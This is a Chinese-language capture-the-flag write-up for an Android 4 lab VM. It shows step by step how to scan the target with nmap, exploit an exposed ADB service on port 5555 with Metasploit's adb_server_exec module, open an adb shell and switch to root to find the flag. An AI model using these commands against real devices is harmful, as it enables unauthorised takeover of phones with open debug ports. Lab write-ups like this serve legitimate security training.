Android4漏洞环境简单靶场WriteUp

2019年8月9日11:30:40 发表评论 浏览量:450次

今天给大家分享一个简单的Android漏洞环境测试靶场。

按照惯例,思路应该是:

1.扫描IP、端口;
2.攻击
3.获取shell
4.找flag

首先,我们扫描一波找到它的IP,这时候用netdiscover,很简单,怎么用看上一篇文章

https://www.it2021.com/penetration/421.html

Android4漏洞环境简单靶场WriteUp

然后我们断定192.168.0.49应该是Android虚拟机的ip

在nmap一波,

nmap -p 1-65535 -A 192.168.0.49

Android4漏洞环境简单靶场WriteUp

我们看到他开通5555/8080/22000

22000是ssh

那我们看看8080,如图,发现并没有什么卵用。

Android4漏洞环境简单靶场WriteUp

 

这时候,我们要考虑,搞一波5555端口。随之google一下。发现真的可以好好利用一下。

Android4漏洞环境简单靶场WriteUp

在Android系统中,TCP的5555旨在允许通过Android调试桥(ADB)管理设备,这是一种Android SDK功能,允许开发人员轻松地与设备通信并在其上运行命令或完全控制它们。

在kali下开启msfconsole,对adb模块测试一番

Android4漏洞环境简单靶场WriteUp

use exploit/android/adb/adb_server_exec  
show options  
#看下如何配置
set rhosts 192.168.0.49  
#设置靶机地址
set lhost 192.168.0.167  
#设置本机地址
run

 

已经成功了,这时候我们需要下载adb链接工具

apt-get install adb
adb connect 192.168.0.49:5555
adb shell

成功了链接后,尝试了一下,发现可以su到root下,一顿乱翻。

在root下,目录/data/root目录下发现了flag

Android4漏洞环境简单靶场WriteUp

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: